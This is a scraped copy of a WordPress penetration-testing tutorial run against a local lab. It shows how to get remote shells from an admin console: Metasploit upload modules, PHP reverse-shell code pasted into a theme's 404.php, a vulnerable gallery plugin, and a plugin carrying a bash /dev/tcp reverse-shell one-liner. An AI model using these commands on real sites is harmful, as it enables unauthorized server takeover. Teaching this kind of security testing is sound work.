Scribd
Upload
173 views14 pages

Wordpress: Reverse Shell: Penetration Testing September 28, 2019 Raj Chandel

1. The document discusses multiple methods to exploit a WordPress site to obtain remote access, including using Metasploit to upload a malicious plugin, injecting PHP code into WordPress themes, uploading a vulnerable plugin, and injecting a custom malicious plugin. 2. It provides steps to use the Metasploit wp_admin_shell_upload exploit module and a PHP reverse shell to inject code and get a reverse shell on the target server. 3. Additional techniques demonstrated include modifying the 404.php template to inject PHP code and uploading a vulnerable reflex-gallery plugin that can be exploited via Metasploit.

Uploaded by

eve johnson
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as DOCX, PDF, TXT or read online on Scribd
173 views14 pages

Wordpress: Reverse Shell: Penetration Testing September 28, 2019 Raj Chandel

1. The document discusses multiple methods to exploit a WordPress site to obtain remote access, including using Metasploit to upload a malicious plugin, injecting PHP code into WordPress themes, uploading a vulnerable plugin, and injecting a custom malicious plugin. 2. It provides steps to use the Metasploit wp_admin_shell_upload exploit module and a PHP reverse shell to inject code and get a reverse shell on the target server. 3. Additional techniques demonstrated include modifying the 404.php template to inject PHP code and uploading a vulnerable reflex-gallery plugin that can be exploited via Metasploit.

Uploaded by

eve johnson
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as DOCX, PDF, TXT or read online on Scribd
You are on page 1/ 14

WordPress: Reverse Shell

posted inPenetration Testing on September 28, 2019 by Raj Chandel


SHARE

This post is related to WordPress security testing to identify what will be possible procedure
to exploit WordPress by compromising admin console. We have already setup WordPress in
our local machine but if you want to learn WordPress installation and configuration then visit
the link given below.

https://www.hackingarticles.in/wordpress-penetration-testing-lab-setup-in-ubuntu/

As we all know wpscan is a standalone tool for identifying vulnerable plugins and themes of
WordPress, but in this post, we are not talking wpscan tutorial.

Table of Content

 Metasploit Framework
 Injecting Malicious code in WP_Theme
 Upload Vulnerable WP_Pulgin
 Inject Malicious Plugin

Requirement:

Host machine: WordPress

Attacker machine: Kali Linux

WordPress Credential: admin: admin (in our case)

Let’s begin!!

As you can observe that I have access of WordPress admin console over the web browser, for
obtaining web shell we need to exploit this CMS. There are multiple methods to exploit
WordPress, let’s go for some operations.
Metasploit Framework

The very first method that we have is Metasploit framework, this module takes an
administrator username and password, logs into the admin panel, and uploads a payload
packaged as a WordPress plugin. Because this is authenticated code execution by design, it
should work on all versions of WordPress and as a result, it will give meterpreter session of
the webserver.

msf > use exploit/unix/w ebapp/


msf exploit(w p_admin_shell_up
msf exploit(w p_admin_shell_up
msf exploit(w p_admin_shell_up

1 msf > use exploit/unix/webapp/wp_admin_shell_upload


2 msf exploit(wp_admin_shell_upload) > set USERNAME admin
3 msf exploit(wp_admin_shell_upload) > set PASSWORD admin
4 msf exploit(wp_admin_shell_upload) > set targeturi /wordpress
5 msf exploit(wp_admin_shell_upload) > exploit
Great!! It works wonderfully and you can see that we have owned the reverse connection of
the web server via meterpreter session.

Injecting Malicious code in WP_Theme

There’s also a second technique that lets you spawn web server shells. If you have a username
and password for the administrator, log in to the admin panel and inject malicious PHP code
as a wordpress theme.
Login into WP_dashboard and explore the appearance tab.
Now go for theme twenty fifteen chose the templet into 404.php
You see a text area for editing templet, inject your malicious php code here to obtain reverse
connection of the webserver.
Now, to proceed further, we used the reverse shell of PHP (By Penetstmonkey). And then we
copied the above php-reverse-shell and paste it into the 404.php wordpress template as shown
in the picture below. We have altered the IP address to our present IP address and entered any
port you want and started the netcat listener to get the reverse connection.

 
Update the file and browse the following URL to run the injected php code.

http://192.168.1.101/w ordpress

1 http://192.168.1.101/wordpress/wp-content/themes/twentyfifteen/404.php
you will have your session upon execution of 404.php file. Access netcat using the following
command:

Upload Vulnerable WP_Plugin

Some time logon users do not own writable authorization to make modifications to the
WordPress theme, so we choose “Inject WP pulgin malicious” as an alternative strategy to
acquiring a web shell.

So, once you have access to a WordPress dashboard, you can attempt installing a malicious
plugin. Here I’ve already downloaded the vulnerable plugin from exploit db.

Click here to download the plugin for practice.


Since we have zip file for plugin and now it’s time to upload the plugin.

Dashboard > plugins > upload plugin


Browse the downloaded zip file as shown.

Once the package gets installed successfully, we need to activate the plugin.

When everything is well setup then go for exploiting. Since we have installed vulnerable
plugin named “reflex-gallery” and it is easily exploitable.

You will get exploit for this vulnerability inside Metasploit framework and thus load the
below module and execute the following command:

use exploit/unix/w ebapp/w p_sl


set rhosts 192.168.1.101
set targeturi /w ordpress
exploit
1 use exploit/unix/webapp/wp_slideshowgallery_upload
2 set rhosts 192.168.1.101
3 set targeturi /wordpress
4 exploit

As the above commands are executed, you will have your meterpreter session. Just as
portrayed in this article, there are multiple methods to exploit a WordPress platformed
website.

Inject Malicious Plugin

As you have seen above that we have uploaded the vulnerable plugin whose exploit is
available. But this time we are going to inject our generated malicious plugin for obtain
reverse shell.

This is quite simple as we have saved malicious code for reverse shell inside a php file named
“revshell.php” and compressed the file in zip format.

exec("/bin/bash -c 'bash -i >& /d

1 exec("/bin/bash -c 'bash -i >& /dev/tcp/10.0.0.1/8080 0>&1'")


Again, repeat the same step as done above for uploading plugin “revshell.zip” file and start
netcat listener to obtain the reverse connection of the target machine.

Once the package gets installed successfully, we need to activate the plugin.
As soon as you will activate the plugin it will through the reverse connection as netcat
session.

Author: Komal Singh is a Cyber Security Researcher and Technical Content Writer, she is
completely enthusiastic pentester and Security Analyst at Ignite Technologies. Contact Here

Share this:

 Click to share on Twitter (Opens in new window)


 Click to share on Facebook (Opens in new window)

Like this:

You might also like

pFad - Phonifier reborn

Pfad - The Proxy pFad of © 2024 Garber Painting. All rights reserved.

Note: This service is not intended for secure transactions such as banking, social media, email, or purchasing. Use at your own risk. We assume no liability whatsoever for broken pages.


Alternative Proxies:

Alternative Proxy

pFad Proxy

pFad v3 Proxy

pFad v4 Proxy